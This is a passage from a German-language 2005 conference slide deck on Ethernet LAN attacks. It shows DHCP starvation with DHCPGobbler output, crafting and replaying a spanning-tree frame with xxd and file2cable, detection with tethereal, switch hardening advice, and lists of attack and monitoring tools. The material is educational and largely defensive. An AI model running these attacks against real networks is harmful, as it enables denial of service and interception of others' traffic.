IP-Adressen für Gateway (G), DNS-Server (D) und DHCP-Server (A)
![Page 23: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/23.jpg)
IT-Symposium 2005
23www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 45
tethereal• tethereal protokolliert DHCP Replies, die andere MAC-
Adresse als der eigentliche DHCP-Server verwenden.
• Anschließend kann man Switchport für die MAC-Adresse 00:10:7b:7f:b6:c1 über Bridge MIB bestimmen.
# tethereal -Nmnt -li eth1 not ether src aa:00:04:00:6f:fc and udp dst port 68Capturing on eth12005-02-04 14:12:17.264303 00:10:7b:7f:b6:c1 -> ff:ff:ff:ff:ff:ff 192.168.1.33 -> 255.255.255.255 DHCP DHCP Offer - Transaction ID 0x133b
MAC-Adresse des "richtigen" DHCP-Servers.
March 31, 2005 Andreas Aurand, HP Network Competence Center 46
DHCP Starvation• Angreifer “spooft” den DHCP Packet Exchange
• Fordert alle verfügbaren IP-Adressen vom Servers an
• Server kann Clients keine Adresse mehr zuweisen• DoS-Attacke auf den DHCP-Server.
attack# DHCPGobbler -gDetecting DHCP service for gobble attackDHCP server at 1A92.168.1.190 offering 192.168.1.101 with subnet mask 255.255.255.0 gateway 192.168.1.1 and DNS 10.185.208.34192.168.1.101 gobbled using MAC 0:28:c:a8:5e:a7192.168.1.102 gobbled using MAC 0:a8:25:24:5e:51192.168.1.103 gobbled using MAC 0:48:c4:b3:a9:a0192.168.1.104 gobbled using MAC 0:3c:63:ab:41:f3192.168.1.105 gobbled using MAC 0:73:92:a7:75:1b….
DHCP-Server192.168.1.190
Angreifer
Da DHCP-Server seine ganzen Adressen vergeben hat, kann er DHCP Requests der Clients nicht mehr beantworten.
DHCP RequestDHCP Request
Vorgetäuschter DHCP-PaketaustauschVorgetäuschter DHCP-Paketaustausch DHCP Clients
Für jede Anforderung muss eine neue MAC-Adresse verwendet werden
![Page 24: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/24.jpg)
IT-Symposium 2005
24www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 47
tethereal• tethereal protokolliert alle DHCP Requests
# ethereal -a duration:300 -i tu0 -qz conv,ether udp dst port 67================================================================================Ethernet ConversationsFilter:<No Filter>
| <- | | -> | | Total || Frames Bytes | | Frames Bytes | | Frames Bytes |
08:00:2b:2b:98:32 <-> ff:ff:ff:ff:ff:ff 0 0 10 3780 10 378008:00:2b:93:2f:8a <-> ff:ff:ff:ff:ff:ff 0 0 10 3780 10 378008:00:2b:a2:7d:08 <-> ff:ff:ff:ff:ff:ff 0 0 5 1890 5 1890================================================================================
March 31, 2005 Andreas Aurand, HP Network Competence Center 48
Andere LAN-Attacken
![Page 25: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/25.jpg)
IT-Symposium 2005
25www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 49
Andere LAN-Attacken
• Spanning-Tree-Attacken• Schutz durch richtige Konfiguration der Switches
• Festlegen an welchen Ports andere Switches angeschlossen werden dürfen
• Festlegen über welche Ports die Root Bridge gesehen werden darf
• VLAN-Attacken• Schutz durch richtige Konfiguration der Switches
• Eigenes VLAN für Trunk-Verbindungen
• VLAN 1 nicht verwenden
March 31, 2005 Andreas Aurand, HP Network Competence Center 50
file2cable• sendet Binärdatei als Ethernet Frame
# tethereal -x -ni eth0 ether dst 01:80:c2:00:00:00Capturing on eth00.000000 00:01:63:55:9a:f1 -> 01:80:c2:00:00:00 STP Conf. Root = 0/00:0e:7f:5c:f6:80 Cost = 3019 Port = 0x8042
0000 01 80 c2 00 00 00 00 01 63 55 9a f1 00 26 42 42 ........cU...&BB0010 03 00 00 00 00 00 00 00 00 0e 7f 5c f6 80 00 00 ...........\....0020 0b cb 20 00 00 50 54 14 a8 00 80 42 02 00 14 00 .. ..PT....B....0030 02 00 0f 00 00 00 00 00 00 00 00 00 ............
# xxd -r stp.txt stp.bin# file2cable -v -i eth0 -f stp.binfile2cable - by FX <[email protected]>
Thanx got to Lamont Granquist & fyodor for their hexdump()stp.bin - 60 bytes raw data
0180 c200 0000 0001 6355 9af1 0026 4242 ........cU...&BB0300 0000 0000 0000 000e 7f5c f680 0000 ...........\....0bcb 2000 0050 5414 a800 8042 0200 1400 .. ..PT....B....0200 0f00 0000 0000 0000 0000 ............
Packet length: 60
Der mit tethereal erzeugte HEX Outputwird in die Datei stp.txt kopiert.
xxd: Umwandlung der Text- in eine Binärdatei.
![Page 26: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/26.jpg)
IT-Symposium 2005
26www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 51
Netdisco• Anzeige der Ports, die auf Blocking stehen
March 31, 2005 Andreas Aurand, HP Network Competence Center 52
LAN-Sicherheit• http://www.dpunkt.de/buch/3-89864-297-6.html
![Page 27: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/27.jpg)
IT-Symposium 2005
27www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 53
Tools• DSNIFF Tools (macof, arpspoof, dnsspoof, sshmitm …)
• http://monkey.org/~dugsong/dsniff/
• Cain• http://www.oxid.it
• Ethereal (tethereal)• http://www.ethereal.com
• Netdisco• http://www.netdisco.org
March 31, 2005 Andreas Aurand, HP Network Competence Center 54
Tools• macchanger
• http://www.alobbs.com/
• arpwatch• http://http://www-nrg.ee.lbl.gov/
• DHCP Gobbler• http://www.networkpenetration.com/
• file2cable• http://www.phenoelit.de/fr/tools.html
![Page 28: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/28.jpg)
IT-Symposium 2005
28www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 55
Tools• MRTG (Multi Router Traffic Grapher)
• http://www.mrtg.org• http://people.ee.ethz.ch/~oetiker/webtools/mrtg/pub/
contrib/cammer
• ARP-Guard (kommerziell)• http://www.arp-guard.com/
ARP SpoofingMAC SpoofingMAC FloodingZuordnung zwischen Switchport und MAC-Adresse
March 31, 2005 Andreas Aurand, HP Network Competence Center 56
Fragen
??
?
??
?
?
?